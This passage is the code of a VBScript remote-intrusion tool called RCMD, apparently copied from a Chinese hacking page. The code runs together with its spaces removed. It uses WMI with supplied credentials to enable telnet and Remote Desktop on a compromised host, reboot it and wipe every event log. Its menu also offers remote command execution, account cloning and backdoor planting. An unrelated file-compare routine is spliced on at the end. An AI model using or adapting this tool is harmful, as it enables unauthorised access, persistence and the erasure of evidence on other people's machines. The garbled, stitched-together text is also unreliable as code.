intstatus=objinstance.stopservice() showerror(intstatus) wscript.echo"TargettelnetserverhasbeenSTOPSuccessfully." else showerror(intstatus) wscript.echo"pleseenterthentlm:" ntlm=WScript.StdIn.Readline() wscript.echo"pleseentertheport:" port=WScript.StdIn.Readline() ifnotisnumeric(ntlm)orntlm<0orntlm>2then wscript.echo"ThevalueofNTMLiswrong." callmain() endif ifnotisnumeric(port)then wscript.echo"Thevalueofportiswrong." main() endif setobjswbemservices1=objlocator.connectserver(ipaddress,"root/default",username,password) outstreem.write"SettingNTLM="&ntlm&"...." setobjinstance1=objswbemservices1.get("stdregprov") setobjmethod=objinstance1.methods_("SetDWORDvalue") setobjinparam=objmethod.inparameters.spawninstance_() objinparam.hdefkey=&h80000002 objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0" objinparam.svaluename="NTLM" objinparam.uvalue=ntlm setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam) showerror(objoutparam.returnvalue) outstreem.write"Settingport="&port&"...." objinparam.svaluename="TelnetPort" objinparam.uvalue=port setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam) showerror(objoutparam.returnvalue) intstatus=objinstance.startservice() wscript.echo"TargettelnetserverhasbeenSTARTSuccessfully!" wscript.echo"Now,youcantry:telnet"&ipaddress&""&port&",togetashell." endif next callmain() endfunction '******************************************************** functionrs() outstreem.write"CheckingTheOSType...." setcolinstoscaption=objswbemservices.execquery("selectcaptionfromwin32_operatingsystem") foreachobjinstoscaptionincolinstoscaption ifinstr(objinstoscaption.caption,"Server")>0then wscript.echo"OK!" else wscript.echo"OK!" wscript.echo"OSTypeis"&objinstoscaption.caption wscript.echo"youcann'topenterminalservices,canceling...."&chr(13)'60 callmain() endif next wscript.echo"pleseentertheport:" port=WScript.StdIn.Readline() ifnotisnumeric(port)orport<1orport>65000then'50 wscript.echo"Thenumberofportiserror." callmain() endif outstreem.write"Writingintoregistry...." setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov") HKLM=&h80000002 withobjinstreg .createkey,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache" .setdwordvalueHKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0'70 .createkeyHKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer" .setdwordvalueHKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1 .setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Control\TerminalServer","TSEnabled",1 .setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2 .setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2 .setstringvalueHKLM,".DEFAULT\KeyboardLayout\Toggle","Hotkey","1" .setdwordvalueHKLM,"SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp","PortNumber",port endwith showerror(err.number) wscript.echo"Now,youneedtoreboottarget!" wscript.echo"Doyouwanttoreboottargetnow?[y/n]" strcancel=WScript.StdIn.Readline() ifstrcancel="n"then wscript.echo"youneedtoreboottargetthen!!" callmain() else callreboot() endif wscript.echo"Youcanlogonterminalserviceson"&port&"later,Goodluck!" callmain() endFunction '************************************************************** functionclog() outstreem.write"Clearingalllogs...." strwqlquery="select*fromWin32_NTEventLogFile" setcolinstances=objswbemservices.execquery(strwqlquery,"wql",&h20) foreachobjinstanceincolinstances ifobjinstance.cleareventlog()<>0then wscript.echo"Error!"'100 callmain() endif next wscript.echo"OK!" wscript.echo"AlllogshavebeenclearedSuccessfully!" callmain() endfunction '*************************************************************** functionshowerror(errornumber) iferrornumberThen wscript.echo"Error0x"&cstr(hex(err.number))&"." iferr.description<>""then wscript.echo"Errordescription:"&err.description&"." endif callmain() else wscript.echo"OK!" endif endfunction '***************************************************************** functionusage() wscript.echostring(79,"*") wscript.echo"RCMDv1.05" wscript.echo"RemoteexecutionScript,by黑嘿黑" wscript.echo"Welcometovisite" wscript.echo"QQ:123230273E-mail:cnhacker521@hotmail.com" wscript.echo"Usage:" wscript.echo"cscript"&wscript.scriptfullname&"targetIPusernamepassword" wscript.echo"Thenchosethecommand>" wscript.echostring(79,"*") endfunction '********************************************************** functionmain() wscript.echo"" wscript.echo"Nowchosethecommand>" wscript.echo"0.quit退出脚本" wscript.echo"1.telnet远程开/关telnet" wscript.echo"2.3389远程开3389" wscript.echo"3.clog远程删除所有日志" wscript.echo"4.getf获取肉鸡系统信息" wscript.echo"5.pslist例出进程" wscript.echo"6.pskill删除进程" wscript.echo"7.command远程执行DOS命令" wscript.echo"8.reboot远程重启肉鸡" wscript.echo"9.slist例出远程肉鸡上的服务信息" wscript.echo"A.Share1.列出共享2.创建共享3.删除共享" wscript.echo"B.ca克隆帐号" wscript.echo"C.Door种植后门" wscript.echostring(79,"*") wscript.echo"CMD>" cmd=WScript.StdIn.Readline() wscript.echo"" SelectCasecmd case"telnet","1" telnet() case"3389","2" rs() case"clog","3" clog() case"getf","4" inf() case"psl","pslist","5" pslist() case"psk","pskill","6" pskill() case"cmd","command","7" command() case"reboot","8" reboot() case"slist","9" listlistsvr() case"share","10","a","A" share() case"B","b","11" ca() case"C","c","12" door() case"quit","0" wscript.quit endselect endfunction 标签:博物馆2-2FunctionCompFile(F1asstring,F2asstring)asbooleanDimissameasbooleanOpenF1ForBinaryAs#1OpenF2ForBinaryAs#2issame=TrueIfLOF(1)<>LOF(2)Thenissame=FalseElsewhole&=LOF(1)\10000'numberofwhole10,000bytechunkspart&=LOF(1)Mod10000'remainingbytesatendoffilebuffer1$=String$(10000,0)buffer2$=String$(10000,0)start&=1Forx&=1Towhole&'thisfor-nextloopwillget10,000Get#1,start&,buffer1$'bytechunksatatime.Get#2,start&,buffer2$Ifbuffer1$<>buffer2$Thenissame=FalseExitForEndIfstart&=start& 10000Nextbuffer1$=String$(part&,0)buffer2$=String$(part&,0)Get#1,start&,buffer1$'gettheremainingbytesattheendGet#2,start&,buffer2$'gettheremainingbytesattheendIfbuffer1$<>buffer2$Thenissame=FalseEndIfCloseCompFile=issameEndFunction->

本脚本还会不断升级，增加新的功能。